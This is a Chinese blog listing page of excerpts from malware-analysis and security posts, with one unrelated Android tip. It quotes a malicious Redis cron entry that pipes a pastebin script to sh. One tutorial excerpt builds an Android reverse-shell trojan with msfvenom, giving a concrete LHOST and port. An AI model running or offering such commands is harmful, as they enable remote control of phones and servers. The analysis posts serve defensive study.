有一天,在机缘巧合之下我获得了一个锁机软件(是多巧合阿喂!),然后兴高采烈的把它拖入了虚拟机里蹂躏(>_<!)。 很巧,软件有虚拟机检测。。。 Emmmm好吧,随便过一下。。。 我用的虚拟机是VMware12,网上查到了一段过检测的代码 ...
写个笔记记录一下,起因是朋友在QQ上发了个连接叫我看看 安不安全,叫我帮他看看,反正在店里待着也没生意,那就顺便看看咯。 打开这个网址 会自动弹出下载一个名为OOXX的APK安装包。 起先我的思路是想先从这个网站下手 先搞定这个网站或者服务器吧, 然后我就去网站主页看了下。是一个网址缩短 变形 的网站。 那么我们给地址还原成真实地址,http: . . . : ooxx.apk 这就是真实的网址。 ...
2016-01-07 16:43 1 5283 推荐指数:
有一天,在机缘巧合之下我获得了一个锁机软件(是多巧合阿喂!),然后兴高采烈的把它拖入了虚拟机里蹂躏(>_<!)。 很巧,软件有虚拟机检测。。。 Emmmm好吧,随便过一下。。。 我用的虚拟机是VMware12,网上查到了一段过检测的代码 ...
0x00 前言 这个病毒应该是比较简单的,别人给我的样本,让我帮忙看看,看样子是很早的一个病毒,针对Windows XP系统的,行为分析很简单,但是想着不能就仅仅分析关键点,要不就把整个结构给逆向出来,弄了两天,搞的差不多了,简单的记录一下。 0x01 基本介绍 整个病毒是4个文件组成 ...
使用Kali的metasploit生成安卓APK木马控制安卓手机 前提:在虚拟机里面安装kali系统,再就是本机安装一个夜神模拟器,和一个安卓5的环境 如果不会的话,可以报名跟我们学习,联系方式hk007.cn 第一步:在终端输入ip addr命令查看kali主机的IP地址 ...
病毒包和工具包下载:Github 一.前言 二.建立对手动查杀病毒技术的正确认识 1.病毒分析方法 2.病毒查杀步骤 3.必备知识 * 1) 熟悉windows系统进程 * 2) 熟悉常见端口与进程对应关系 * 3) 熟悉windows自带系统服务 ...
病毒来源:朋友服务器发现此木马 当时为了提样本搞了很久,一直找恢复文件,对提取样本有研究的朋友还请指导指导。 文件名:vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此处创建了一个进程 申明了一个2800大小 ...
起因 偶然间发现redis里有一个陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的,再看value我警觉了,这是要定时执行脚本啊。 分析 ...
创建个通道./ngrok tcp 1113 msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.62.13 LPORT=17016 R > ttxd.apk 现在我把这个apk导入到手机上然后运行 ...
记一次小米手机安装Google Play(其他手机类似) 最近换了一款小米10青春版,性价比很高,对于开发者而言,手机自带商店的软件内容往往不能满足需求,而需要单独定制习惯性的APP,博主通过最近的尝试,已经成功将内容安装到手机,并分享整理如下。 手机:小米10青春版 版本 ...